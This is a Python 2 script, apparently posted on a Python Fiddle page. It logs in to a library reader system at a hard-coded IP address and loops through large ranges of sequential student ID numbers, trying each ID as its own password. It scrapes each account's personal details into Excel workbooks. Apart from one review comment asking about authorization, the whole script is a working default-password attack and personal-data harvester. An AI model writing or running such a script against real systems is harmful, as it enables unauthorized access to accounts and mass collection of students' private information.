import HTMLParser
import urlparse
import urllib
import urllib2
import cookielib
import string
import re

import xlwt


# Pattern for one labelled field on the reader-info page: group 1 is the text
# inside the "bluetext" span, group 2 is whatever follows it up to the closing
# </TD>. Compiled once at import time instead of on every RegularCal() call.
_INFO_FIELD_RE = re.compile('<span class="bluetext">(.*?)</span>(.*?)</TD>')


def htmlread(post='http://202.116.41.246:8080/reader/', idn=2013021801, psw=2013021801):
    """Log in to the reader site and return the HTML of the reader-info page.

    Args:
        post: Base URL of the reader application, ending with a slash. The
            login form is posted to ``post + 'redr_verify.php'`` and the
            info page is fetched from ``post + 'redr_info.php'``.
        idn: Account number sent as the ``number`` form field.
        psw: Password sent as the ``passwd`` form field.

    Returns:
        The raw body of the info page, exactly as read from the response.

    Raises:
        urllib2.URLError: propagated unchanged if either request fails.
    """
    # The cookie jar carries the session cookie set by the login request over
    # to the follow-up request for the info page.
    cookie = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie))

    posturl = post + 'redr_verify.php'
    # Browser-like headers so the request resembles a normal form submission.
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.66 Safari/537.36',
               'Referer': 'http://202.116.41.246:8080/reader/redr_cust_result.php'}
    # Form fields as captured from the browser's login request.
    postdata = urllib.urlencode({'number': str(idn), 'passwd': str(psw),
                                 'select': 'cert_no', 'returnUrl': ''})

    req = urllib2.Request(posturl, postdata, headers)
    # Only the cookies set by the login matter; the body is not needed, so
    # release the connection immediately.
    opener.open(req).close()

    for item in cookie:
        print('Cookie:Value = ' + item.value)

    info_response = opener.open(post + 'redr_info.php')
    try:
        return info_response.read()
    finally:
        info_response.close()


def RegularCal(html):
    """Extract the labelled fields from the info-page HTML.

    Args:
        html: Page source as returned by htmlread().

    Returns:
        A list of 2-tuples ``(span_text, trailing_text)``, one per match of
        the "bluetext" span pattern; an empty list when nothing matches.
    """
    return _INFO_FIELD_RE.findall(html)


def WriInEx(path0='C:/Users/kanon/Desktop/studentinfo.xls', idn=20112600000):
    """Fetch info pages for 300 consecutive IDs and store the fields in an .xls file.

    For each offset ``i`` in ``0..299`` the page for ID ``idn + i`` is fetched
    (the same number is used as account number and password). Every matched
    field pair is written to sheet ``info`` at column = 1-based index of the
    match, rows ``2*i`` (span text) and ``2*i + 1`` (trailing text). Empty
    values are stored as ``'0'``. IDs whose page yields no fields are skipped.

    Args:
        path0: Destination path of the workbook.
        idn: First ID of the range; per the original author's note, the first
            four digits of an ID are the enrollment year.

    NOTE(review): this logs in to a run of sequential accounts using the ID as
    the password. Confirm it is only run against accounts the operator is
    authorized to access.
    """
    workbook = xlwt.Workbook('gbk', 0)
    sheet = workbook.add_sheet('info')

    for offset in range(300):
        candidate = idn + offset
        html = htmlread(post='http://202.116.41.246:8080/reader/',
                        idn=candidate, psw=candidate)
        data = RegularCal(html)
        if not data:
            continue

        print(offset)
        first_row = 2 * offset
        try:
            for colnum, col in enumerate(data, 1):
                for rownum, raw in enumerate(col):
                    # Decode the page bytes as UTF-8; blank cells become '0'.
                    val = raw.decode('utf-8') or '0'
                    # write(row, column, cell content)
                    sheet.write(first_row + rownum, colnum, val)
        except Exception as e:
            # Best effort: report the problem and carry on with the next ID.
            print(str(e))

    # Saved once after the whole range has been processed.
    workbook.save(path0)


if __name__ == '__main__':
    base_idn = 20120300000
    # yuannum / nianji / ban are presumably department / grade / class
    # indices (pinyin names); they also label the output file.
    for yuannum in range(30):
        for nianji in range(4):
            for ban in range(2):
                path = 'D:/num%s%s%sstudinfo.xls' % (nianji, yuannum, ban)
                # Derive the start ID from the fixed base every time. The
                # previous code kept adding to a running total, so the ID
                # drifted away from the indices used in the file name.
                idn = (base_idn
                       + yuannum * 100000
                       + nianji * 10000000
                       + ban * 1000)
                WriInEx(path, idn)
Run
Reset
Share
Import
Link
Embed
Language▼
English
中文
Python Fiddle
Python Cloud IDE
Follow @python_fiddle
Browser Version Not Supported
Due to Python Fiddle's reliance on advanced JavaScript techniques, older browsers might have problems running it correctly. Please download the latest version of your favourite browser.
Chrome 10+
Firefox 4+
Safari 5+
IE 10+
Let me try anyway!
url:
Go
Python Snippet
Stackoverflow Question